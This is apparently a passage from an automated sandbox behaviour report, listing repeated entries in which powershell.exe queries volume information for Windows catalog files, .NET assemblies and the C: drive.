Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
